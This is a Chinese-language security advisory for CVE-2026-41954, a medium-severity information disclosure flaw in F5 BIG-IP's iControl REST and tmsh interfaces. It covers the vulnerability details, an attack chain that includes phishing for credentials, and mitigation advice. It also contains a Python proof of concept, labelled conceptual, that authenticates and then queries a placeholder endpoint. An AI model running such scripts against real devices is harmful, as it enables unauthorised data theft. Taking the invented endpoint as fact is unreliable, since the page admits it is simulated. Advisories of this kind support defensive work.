CVE-2026-41954 F5 BIG-IP 敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-41954

漏洞类型

信息泄露

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2026-41954 是 F5 BIG-IP 系统中发现的一个敏感信息泄露漏洞。该漏洞存在于未公开的 iControl REST 端点和 TMOS Shell (tmsh) 命令中。由于权限控制机制存在缺陷，拥有资源管理员角色权限的经过身份验证的攻击者可以利用此漏洞越权访问并查看系统敏感信息。该漏洞攻击复杂度低，无需用户交互，已达到 EoTS（技术支持终止）的软件版本不在评估范围内。

技术细节

该漏洞源于 F5 BIG-IP 的 iControl REST 框架和 tmsh 接口在处理特定端点请求时的权限校验逻辑不足。虽然 iControl REST 通常要求严格的 RBAC（基于角色的访问控制），但在受影响的未公开端点中，系统未正确验证调用者的上下文权限。具体而言，具有“资源管理员”角色的用户本应仅限于特定资源的操作，但通过构造特定的 HTTP 请求向漏洞端点发送查询，或执行特定的 tmsh 命令，可以绕过部分内部限制，读取到系统级的敏感配置或其他高权限数据。由于 CVSS 向量为 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N，攻击者必须具备高权限账户，但一旦满足前置条件，即可在网络环境下直接获取数据，严重影响机密性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标 F5 BIG-IP 设备，确定其管理接口（iControl REST）的暴露情况。

STEP 2

2. 获取凭证

攻击者通过钓鱼、暴力破解或利用其他漏洞获取具有“资源管理员”角色的合法账户凭证。

STEP 3

3. 漏洞利用

攻击者使用获取的凭证登录系统，并向存在漏洞的未公开 REST 端点或执行特定的 tmsh 命令。

STEP 4

4. 数据泄露

系统响应请求，返回本应受保护的敏感信息，攻击者成功获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41954 (Conceptual Example)
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_poc(target_ip, username, password):
    # F5 BIG-IP Management URL
    base_url = f"https://{target_ip}/mgmt"
    
    # 1. Authenticate to get the token
    auth_url = f"{base_url}/shared/authn/login"
    auth_payload = {
        "username": username,
        "password": password,
        "loginProviderName": "tmos"
    }
    
    session = requests.Session()
    session.verify = False
    
    try:
        print(f"[*] Attempting to authenticate as {username}...")
        resp = session.post(auth_url, json=auth_payload)
        if resp.status_code != 200:
            print("[-] Authentication failed.")
            return
        
        token = resp.json().get('token', {}).get('token')
        headers = {
            "X-F5-Auth-Token": token,
            "Content-Type": "application/json"
        }
        
        # 2. Access undisclosed sensitive endpoint (Simulated)
        # Note: Replace with actual endpoint path if disclosed
        vuln_endpoint = f"{base_url}/tm/undisclosed/sensitive/config"
        print(f"[*] Sending request to vulnerable endpoint: {vuln_endpoint}")
        
        vuln_resp = session.get(vuln_endpoint, headers=headers)
        
        if vuln_resp.status_code == 200:
            print("[+] Successfully retrieved sensitive information!")
            print("[+] Data:")
            print(vuln_resp.text)
        else:
            print(f"[-] Request failed with status code: {vuln_resp.status_code}")
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    TARGET = "<BIG_IP_IP>"
    USER = "resource_admin"
    PASS = "<PASSWORD>"
    check_poc(TARGET, USER, PASS)

影响范围

F5 BIG-IP (所有受支持版本，具体以厂商公告 K32950402 为准)

防御指南

临时缓解措施

建议立即应用官方提供的安全补丁以修复此漏洞。在无法立即升级的情况下，应通过网络策略严格限制对 F5 BIG-IP 管理端口（默认 443/TCP）的访问，仅允许受信任的管理员 IP 地址连接。同时，应审查系统日志，检查是否存在异常的 API 调用或 tmsh 命令执行记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-41954
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-41954
3 Details https://www.cvedetails.com/cve/CVE-2026-41954/
4 VulDB https://vuldb.com/cve/CVE-2026-41954
5 Link https://my.f5.com/manage/s/article/K32950402